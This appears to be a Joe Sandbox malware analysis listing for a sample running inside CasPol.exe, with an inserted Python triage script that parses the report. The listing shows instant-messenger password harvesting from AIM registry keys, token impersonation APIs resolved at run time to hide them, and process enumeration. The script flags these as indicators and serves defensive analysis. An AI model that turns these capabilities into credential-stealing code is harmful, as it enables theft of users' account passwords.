                                                                                                                                                                                    • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004067CC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                                                                                                    • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407341
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407349
                                                                                                                                                                                    • free.MSVCRT ref: 004076FE
                                                                                                                                                                                      • Part of subcall function 0040746B: free.MSVCRT ref: 00407478
                                                                                                                                                                                      • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                                                                                                                                                                      • Part of subcall function 00406982: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
                                                                                                                                                                                      • Part of subcall function 00406982: free.MSVCRT ref: 004069BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                                                                                                                                                                      • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040B61C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040B799
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B7E1
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B812
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B820
                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                                                                                                                                                                      • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                                                                                                                                                                      • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                                                                                                                                                                    • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040246E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                                                                                                                                                                      • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,00000048), ref: 004025B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004025F4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004025FC
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
• String ID: '$)$)$0$5$:$G$W$X$[$[$f
• API String ID: 3606715663-4187034442
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscat$memsetsprintf$_mbscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 633282248-1996832678
APIs
• GetDlgItem.USER32(?,000003EC), ref: 00401118
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
  • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
• GetDlgItem.USER32(?,000003EC), ref: 00401161
• ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
• LoadCursorA.USER32(00000067), ref: 00401186
• SetCursor.USER32(00000000), ref: 0040118D
• GetDlgItem.USER32(?,000003EC), ref: 0040119D
• SetBkMode.GDI32(?,00000001), ref: 004011B1
• SetTextColor.GDI32(?,00C00000), ref: 004011BF
• GetSysColorBrush.USER32(0000000F), ref: 004011C7
• EndDialog.USER32(?,00000001), ref: 004011E5
• DeleteObject.GDI32(?), ref: 004011F1
• SetWindowTextA.USER32(?,MessenPass), ref: 00401204
• SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
• SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
• String ID: MessenPass
• API String ID: 2410034309-1347981195
APIs
• _mbscpy.MSVCRT(0041E200,?), ref: 00409080
• _mbscpy.MSVCRT(0041E308,general,0041E200,?), ref: 00409090
  • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
  • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
  • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
• EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
• EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
• _mbscpy.MSVCRT(0041E308,strings), ref: 004090E3
• memset.MSVCRT ref: 004090FF
• LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
  • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 1035899707-2179912348
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,?), ref: 00411053
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
APIs
• SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
• MapDialogRect.USER32(?,?), ref: 00405C7D
• memset.MSVCRT ref: 00405D4B
• sprintf.MSVCRT ref: 00405D6E
• SetWindowTextA.USER32(?,?), ref: 00405D83
• LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00405D90
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
• FreeLibrary.KERNEL32(00000000), ref: 00405DB1
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
• String ID: %s:$SHAutoComplete$shlwapi.dll
• API String ID: 2601263068-2802052640
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
• String ID: 0$6
• API String ID: 3540791495-3849865405
APIs
• GetParent.USER32(00000000), ref: 004134D2
• GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
• GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
• GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
• GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
• GetWindowRect.USER32(00000000,?), ref: 0041351F
• CopyRect.USER32(?,?), ref: 00413533
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
• SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
                                                                                                                                                                                    • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2317770421-0
                                                                                                                                                                                    • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                                                                                                    • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040A4AC,?,?), ref: 0041247B
                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040A4AC,?,?), ref: 004124A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                                                                                                    • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410DC0
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                                                                                                                                                                      • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00410D94
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DuplicateToken,00000000,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040451C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00404553
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040455D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                                                                                                                                                                    • String ID: DuplicateToken$SetThreadToken
                                                                                                                                                                                    • API String ID: 3357505703-785560009
                                                                                                                                                                                    • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                                                                                                    • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                                                                                                                                                                    • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
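The function summary above is the kind of block a triage analyst reads by eye: advapi32.dll is loaded at run time and OpenProcessToken, DuplicateToken and SetThreadToken are resolved through GetProcAddress rather than imported, which keeps the token-impersonation capability out of the static import table. The following script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses function-analysis blocks in the layout shown here (an "APIs" heading, bullet lines of the form `Api.MODULE(args), ref: addr`, optional "Part of subcall function" prefixes) and flags two indicators that this listing exhibits, dynamically resolved token APIs and window class/title inspection. The sample input is constructed from lines copied off this page; the indicator names, the `TOKEN_APIS` set (real Win32 names, three of which appear on this page) and the `FunctionSummary` structure are this example's own choices, not Joe Sandbox fields.

```python
"""Triage helper for Joe Sandbox 'Function Analysis' blocks (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two function summaries copied from this report's listing
# (the USER32 window walk around 0x004134D2 and the advapi32 token block around 0x0040451C).
SAMPLE_REPORT = """
APIs
• GetParent.USER32(00000000), ref: 004134D2
• GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
• GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
• GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
• SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
• String ID:
APIs
  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410DC0
• FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
  • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00410D94
• GetProcAddress.KERNEL32(00000000,DuplicateToken,00000000,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040451C
• GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
• CloseHandle.KERNEL32(?), ref: 00404553
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$CloseHandleLibrary$FreeLoad
• String ID: DuplicateToken$SetThreadToken
"""

# One bullet line of the APIs section. The argument list is optional because
# CRT calls such as "memset.MSVCRT ref: 00407055" are listed without one.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Token-manipulation APIs worth flagging when resolved by name at run time
# (hypothetical indicator set chosen for this example; all are real Win32 exports).
TOKEN_APIS = {
    "OpenProcessToken", "OpenThreadToken", "DuplicateToken", "DuplicateTokenEx",
    "SetThreadToken", "ImpersonateLoggedOnUser", "AdjustTokenPrivileges",
}


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)      # (module, api, args, ref) per bullet line
    resolved: set = field(default_factory=set)    # names passed to GetProcAddress
    libraries: set = field(default_factory=set)   # names passed to LoadLibrary*
    api_id: str = ""                              # the report's own "API ID" fingerprint


def parse_blocks(text):
    """Split the listing at each 'APIs' heading and collect the calls of every function."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionSummary()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.apis.append((m["module"], m["api"], args, m["ref"]))
            if m["api"] == "GetProcAddress" and len(args) >= 2:
                current.resolved.add(args[1])          # second argument is the export name
            elif m["api"].startswith("LoadLibrary") and args:
                current.libraries.add(args[0].lower())
        elif line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
    return blocks


def assess(block):
    """Return indicator labels for one function summary (names are this example's own)."""
    findings = []
    called = {api for _, api, _, _ in block.apis}
    if len(block.resolved & TOKEN_APIS) >= 2:
        findings.append("dynamic-token-api")        # impersonation primitives hidden from the import table
    if {"GetClassNameA", "GetWindowTextA"} <= called or {"GetClassNameW", "GetWindowTextW"} <= called:
        findings.append("window-inspection")        # class + title read, typical of window/keystroke capture
    return findings


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE_REPORT)):
        print(f"function #{i}: apis={len(b.apis)} libs={sorted(b.libraries)} "
              f"resolved={sorted(b.resolved)} -> {assess(b) or ['no indicator']}")
```

Run against a full report export, the same parser gives a per-function table that can be filtered for resolved-name sets before looking at the fuzzy hashes; the "API ID" string is carried through unmodified because its derivation is Joe Sandbox's and is not reproduced here.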
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$strlen
                                                                                                                                                                                    • String ID: '$'$S'password'$S'username'
                                                                                                                                                                                    • API String ID: 3337090206-859024053
                                                                                                                                                                                    • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                                                                                                    • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040AD3F
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040AD42
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                                                                                                    • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407055
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040707E
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
                                                                                                                                                                                    • strlen.MSVCRT ref: 004070AD
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                    • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                                                                                                    • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00408094
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004), ref: 004080A3
                                                                                                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT(?,?,00000008,00000000,?,?,?,004080BF,?,?,?,00000004,?,?,00000004), ref: 0040C9BA
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                                                                                                                                                                      • Part of subcall function 0040C9C7: memcpy.MSVCRT(?,?,00000010,00000004), ref: 0040CA33
